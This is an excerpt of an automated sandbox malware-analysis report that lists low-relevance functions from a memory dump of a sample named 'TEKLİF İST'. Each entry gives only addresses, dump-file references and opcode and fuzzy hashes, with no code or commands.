                                                                                                              Function 01B48770 Relevance: .1, Instructions: 68COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c67f111deb2652e72f3402053a51a4d05dc2e6b65bb7391502e6fda291eecf31
                                                                                                              • Instruction ID: 1e5639500b4cb5ad702ce6e71697c30827a6e59b494b7855622a79d906e18756
                                                                                                              • Opcode Fuzzy Hash: c67f111deb2652e72f3402053a51a4d05dc2e6b65bb7391502e6fda291eecf31
                                                                                                              • Instruction Fuzzy Hash: 3811BF31700611EBDB19CF9DC4C0A26BBE9EF8A750B19C0ADEE089F204D7B2D901D791
                                                                                                              Function 01B7AAEE Relevance: .1, Instructions: 68COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                              • Instruction ID: ed2b0596f1a0df448807a914551ee7e78adc02af48603e4bcba64bef9389ffda
                                                                                                              • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                              • Instruction Fuzzy Hash: FC216A72600641DBDB799F69C540A7ABBE6EB94B50F1889AEE95AC7B10C770EC01CB40
                                                                                                              Function 01B480E9 Relevance: .1, Instructions: 66COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: eb399b59cc42e928dd3ab97016036fc1e9a08080d477574bf8ff26d9731e3a8c
                                                                                                              • Instruction ID: 699aa5c96781812b67071d20e037c006b9fb6765b61b277acdf88db4c2a3d5da
                                                                                                              • Opcode Fuzzy Hash: eb399b59cc42e928dd3ab97016036fc1e9a08080d477574bf8ff26d9731e3a8c
                                                                                                              • Instruction Fuzzy Hash: 95219F31A00205DFCB18CF99C580B6EBBB5FB88314F2081AED105A7310C771AD46DBD0
                                                                                                              Function 01B7674D Relevance: .1, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6c219faf1c2c695f76cb756fad6f42d302dd6b28faf0a5086558322a580241b7
                                                                                                              • Instruction ID: 6ee22fe5f98933e24f2617db58e951dbf111be69471e2c87a3490ed71b18111c
                                                                                                              • Opcode Fuzzy Hash: 6c219faf1c2c695f76cb756fad6f42d302dd6b28faf0a5086558322a580241b7
                                                                                                              • Instruction Fuzzy Hash: 34219071504A01EFE7298F68C880F66B7F8FF44390F44886DE9AAC7250DB70B840CB60
                                                                                                              Function 01B6E8C0 Relevance: .1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f041750a53eb7331fc5197a867319181c508cb7d0f6a6546fbd1d41b5d22932b
                                                                                                              • Instruction ID: 341f1e2f6c6610d91303580244633f29c72c7b094a0d5110f90e37ef3c90daf6
                                                                                                              • Opcode Fuzzy Hash: f041750a53eb7331fc5197a867319181c508cb7d0f6a6546fbd1d41b5d22932b
                                                                                                              • Instruction Fuzzy Hash: DF110C763041149BCF1EDB29CC41A7F769ADFD5370B6545ADD9228B290EB30D802C790
                                                                                                              Function 01BD6870 Relevance: .1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0081192f6fe6e3cd7a9a6eec6c2d80b4a5f5be40d36e2d2c121914f0812862f6
                                                                                                              • Instruction ID: b3eefa699fbce0a6013887b5d9d2457fa82dfbbd348850c0a7ea6e902e9d7ca1
                                                                                                              • Opcode Fuzzy Hash: 0081192f6fe6e3cd7a9a6eec6c2d80b4a5f5be40d36e2d2c121914f0812862f6
                                                                                                              • Instruction Fuzzy Hash: 3911E332640604EFCB2ACB6DCD40F9A77A8EFA9750F0140A5F605DB261EB75E801C7A0
                                                                                                              Function 01B766B0 Relevance: .1, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f823b06aab086dd95a9446a1cefaf88228220c8f5b7060b3b30c5c1f01b5cbdd
                                                                                                              • Instruction ID: 047859f4dd469976636ff2d010448bf61102e4e52fac3d194b1ce1587603a66c
                                                                                                              • Opcode Fuzzy Hash: f823b06aab086dd95a9446a1cefaf88228220c8f5b7060b3b30c5c1f01b5cbdd
                                                                                                              • Instruction Fuzzy Hash: E911BF76A01655EFDB29CF59C580A5AFBF4EB94790F1140B9DD169B310E730DD00CB90
                                                                                                              Function 01C0A8E4 Relevance: .1, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                              • Instruction ID: 91d29ad2312a67002a1e56e4c487eb69fd8850c90341b8786e8f20b5c475c4b0
                                                                                                              • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                              • Instruction Fuzzy Hash: 2C11B236A00A15EFDB1ACB58C805B9EBBB5EF84210F058269E85697390E671EE51CB80
                                                                                                              Function 01B40AD0 Relevance: .1, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                              • Instruction ID: b9e35fc8295c5883bf6c82146ae56f20b4a8d39e392422863b90d778dc084f06
                                                                                                              • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                              • Instruction Fuzzy Hash: 7D2106B5A00B459FD7A0CF29C440B56BBF4FB48B10F10892EE98AC7B40E371E814CB94
                                                                                                              Function 01BCE7E1 Relevance: .1, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                              • Instruction ID: 60ab45e326e7fcd1d67505abf8eef8785567c955d69bb1e81b259078ab5f8f9d
                                                                                                              • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                              • Instruction Fuzzy Hash: 2011A331601601EFEB299F48C840B5B7FA5EF45F54F0584ACEA099B250E771DC40D790
                                                                                                              Function 01B627ED Relevance: .1, Instructions: 58COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 60d1ab0594a29be33d00788d82263b2fb63080612fce778dd949d62d3e3c2523
                                                                                                              • Instruction ID: 534ff8340ab293fc013ab76ac4db211a6add042684d7b5247de94f6ce061e063
                                                                                                              • Opcode Fuzzy Hash: 60d1ab0594a29be33d00788d82263b2fb63080612fce778dd949d62d3e3c2523
                                                                                                              • Instruction Fuzzy Hash: 9D01C43160A645ABF72EA26D9C84F677B9CFF90794F4540E5F9419B291DB18DC00C2B1
                                                                                                              Function 01B44690 Relevance: .1, Instructions: 57COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ab2675d1cee5aea1802aebee3949e1d1c14597603afc509a11d06ee95a132313
                                                                                                              • Instruction ID: 7a1595bc1f8a03ddc6b75518845d238befeee83581bea163672b7e7f97b2d30a
                                                                                                              • Opcode Fuzzy Hash: ab2675d1cee5aea1802aebee3949e1d1c14597603afc509a11d06ee95a132313
                                                                                                              • Instruction Fuzzy Hash: 8D11E536241645AFDB2DCF5DD844F567BA8EB96764F01C199F9048B350C370E821EF60
                                                                                                              Function 01B76620 Relevance: .1, Instructions: 56COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8350d8fc8f5d936c8a8f2871d37e72a4a4f7939815a617e0b1f7591eb8cf9d2c
                                                                                                              • Instruction ID: b23a7819d0c07d2b8065245f5ad62bacdc8326e67236c16ebb39155c62e83f1e
                                                                                                              • Opcode Fuzzy Hash: 8350d8fc8f5d936c8a8f2871d37e72a4a4f7939815a617e0b1f7591eb8cf9d2c
                                                                                                              • Instruction Fuzzy Hash: 8A11A576A00B15ABEB25DF59D9C0B9EFBB8FF84750F900499EA15B7200D730ED018B60
                                                                                                              Function 01B6EA2E Relevance: .1, Instructions: 56COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c210953e145cc82388fc2a6362ee7cb906c3a77376a19c1073d11a4560ee785c
                                                                                                              • Instruction ID: 6dd56bff86f2e9e4a62eb6c0e8151220e60c7ba7f2ce24b07773c730b0d71c17
                                                                                                              • Opcode Fuzzy Hash: c210953e145cc82388fc2a6362ee7cb906c3a77376a19c1073d11a4560ee785c
                                                                                                              • Instruction Fuzzy Hash: 1F0192755001059FDB29DB19E548F56BBF9FBA5318F2481AAE1058B260C774DC42CB90
                                                                                                              Function 01B6E53E Relevance: .1, Instructions: 55COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                              • Instruction ID: aa2a1d25741fce0b40051d7410258653367bf6d7cd5e17f0f19a6a6f385f2961
                                                                                                              • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                              • Instruction Fuzzy Hash: 3611E9752056C19BEB2B975CC554BB977E8EB10784F1900E5ED4187792F328C842C350
                                                                                                              Function 01BCE75D Relevance: .1, Instructions: 54COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                              • Instruction ID: 7f9f28f6079bb88cc24f395113972892681122e384ee72f1091af42fa4a1091a
                                                                                                              • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                              • Instruction Fuzzy Hash: C001D232600105EFEB299F58C800F6A7EA9EB44F50F0580AAEA459B260E771DD40D790
                                                                                                              Function 01B3A250 Relevance: .1, Instructions: 52COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                              • Instruction ID: 6f5cdd9be4a5ceba24471a20e38f09224fbd93b2cc53f8dff65bedef51f9c113
                                                                                                              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                              • Instruction Fuzzy Hash: 1C0126314047219BCB398F29DC40A367BA4EF95B6071086ADFCD5CB281C731D420CB60
                                                                                                              Function 01BBE1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 990b286c852728ca38e8a6508b4cc333b695c7f53abfe6c309d718a2284a9565
                                                                                                              • Instruction ID: ad74944beb739202789f62a02d5f079944978991c5e2c8bf7ff28dd081df92a9
                                                                                                              • Opcode Fuzzy Hash: 990b286c852728ca38e8a6508b4cc333b695c7f53abfe6c309d718a2284a9565
                                                                                                              • Instruction Fuzzy Hash: AE11A132241241EFDF1AEF19CD80F967BB8FF54B84F2000A5E9059B661C375ED01CA90
                                                                                                              Function 01B46259 Relevance: .1, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 10f02a7386e6d4556b7a1ba1082e0111f432e2d3561a66e0049f6f84a219e9f0
                                                                                                              • Instruction ID: bd8f22d09abff08f8d6009cf0dd749a5189acbc752a571f59f89df637e2cf70c
                                                                                                              • Opcode Fuzzy Hash: 10f02a7386e6d4556b7a1ba1082e0111f432e2d3561a66e0049f6f84a219e9f0
                                                                                                              • Instruction Fuzzy Hash: 41115E71642229ABDF29AB64CD41FE973B4EB04B10F5041D4A314E61E0D7709E81DF84
                                                                                                              Function 01B76DA0 Relevance: .1, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                                                              • Instruction ID: 35f406e19cc4f930314db154a9261cf6aaabdf66c4d2c20727e85f7e9c0aedee
                                                                                                              • Opcode Fuzzy Hash: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                                                              • Instruction Fuzzy Hash: 0C014772A046166BFF2D9B29D804BAFBF68DB84B50F1445A9BA065B280D774DD80C3F0
                                                                                                              Function 01B36DF6 Relevance: .1, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4d4e727fcf0da98f0b44a296489d32d6dbb2fcdeccebab4cbe24613555581b4f
                                                                                                              • Instruction ID: 7cae22f8a7242693453b191d895b1cb6c00d53111668dd6095d6bfc16ce5a89b
                                                                                                              • Opcode Fuzzy Hash: 4d4e727fcf0da98f0b44a296489d32d6dbb2fcdeccebab4cbe24613555581b4f
                                                                                                              • Instruction Fuzzy Hash: F7012471700B02ABDF69AE69D840927B7A4FFD4318B0001BCF94583651DF22EC16C7D0
                                                                                                              Function 01B4208A Relevance: .0, Instructions: 50COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                              • Instruction ID: da5239b7d6b2e05f4b0f3f1f9258bc79e5bc1503836cdc83d245f5cdd1f3ba4d
                                                                                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                              • Instruction Fuzzy Hash: DE01D2322001008BEF199A1DE880BA27BA6FFD8710F1581E9ED01CF346DB71C881E390
                                                                                                              Function 01BC6050 Relevance: .0, Instructions: 50COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 892d9ccbc63a16d1c5b67ea159e59f5bb3879e79f43bb5970303a72433162e35
                                                                                                              • Instruction ID: 3dab2778b8a85390098709c3c1d2c57c08755c37b61d9d452f968a8a1744948f
                                                                                                              • Opcode Fuzzy Hash: 892d9ccbc63a16d1c5b67ea159e59f5bb3879e79f43bb5970303a72433162e35
                                                                                                              • Instruction Fuzzy Hash: 8B111772900019ABCF16DB94CC84EDFBB7CEF58354F0441A6A906A7211EB34EA15CBA1
                                                                                                              Function 01BD6500 Relevance: .0, Instructions: 50COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 72d85c58e1a829225637d2772c0e76ace29b12979a831b89362c4767111f6a43
                                                                                                              • Instruction ID: d245f58669da06ee02c39b00d00bf4079378280f526f237ccb6972198a50ba08
                                                                                                              • Opcode Fuzzy Hash: 72d85c58e1a829225637d2772c0e76ace29b12979a831b89362c4767111f6a43
                                                                                                              • Instruction Fuzzy Hash: FD11C83664414A9FD719CF58D410BA5B7B9FF56318F488199E849CB315E731EC81CBA0
                                                                                                              Function 01BCC810 Relevance: .0, Instructions: 50COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4430239b558f388f7e70e518057eca934eff24f5f410ab9b4406183134acb017
                                                                                                              • Instruction ID: f645d8f06fd741d718d07b69956555fde253bb72b8e1049f22478738c2b02c2b
                                                                                                              • Opcode Fuzzy Hash: 4430239b558f388f7e70e518057eca934eff24f5f410ab9b4406183134acb017
                                                                                                              • Instruction Fuzzy Hash: 6911E8B1A00219ABCB04DFA9D581AAEBBF8FF58750F10406AB905E7351D774EE01CBA4
                                                                                                              Function 01BEEA60 Relevance: .0, Instructions: 50COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 61daab287df6e46e106857b6c5958a11063265536c8481d0c8d510eec2e6f7e7
                                                                                                              • Instruction ID: e5ed7af6990400f51f38270915e154ce0a8672fe368a20d95efe573f1a09bc98
                                                                                                              • Opcode Fuzzy Hash: 61daab287df6e46e106857b6c5958a11063265536c8481d0c8d510eec2e6f7e7
                                                                                                              • Instruction Fuzzy Hash: 29012431041211DBCB3AAF19C408E36BBF9FF92694F0454EEE6024B210CB30DC41CB91
                                                                                                              Function 01B820F0 Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a1bb430778e9cebc5594ec1ad23e784ee9bf870f115f7588ef89b170fb24c48e
                                                                                                              • Instruction ID: ba36e153c6e464bfcea4e9b83157445e442b85b65609e3708613916fda2bb18a
                                                                                                              • Opcode Fuzzy Hash: a1bb430778e9cebc5594ec1ad23e784ee9bf870f115f7588ef89b170fb24c48e
                                                                                                              • Instruction Fuzzy Hash: 08116D75A0120DABCF09EFA5C851BAE7BB5EB54B40F104099F90697290EB35EE11CB90
                                                                                                              Function 01B3C020 Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                              • Instruction ID: 6843eb223f75dd6dcbd700ed131ab91b8eb73da17db7c8a724b34687d839870b
                                                                                                              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                              • Instruction Fuzzy Hash: B801DD321007459FDF2A96AAC440F67BBE9FFD5250F0445AAA99687550DF74E802C760
                                                                                                              Function 01B7E5CF Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d895d8a1c0b3d2df6967deb639446f270fc0ed362ae85bd37ce201cb499057bf
                                                                                                              • Instruction ID: ce7aa8d8e208de82fe62b4349dbe7907513cea2ed7d5799d113ac0c95aa7f7ec
                                                                                                              • Opcode Fuzzy Hash: d895d8a1c0b3d2df6967deb639446f270fc0ed362ae85bd37ce201cb499057bf
                                                                                                              • Instruction Fuzzy Hash: A201F7B1201601BFC759BB3DCD80F53BBECFF99694B0006A5B60583660DB64EC01C6E0
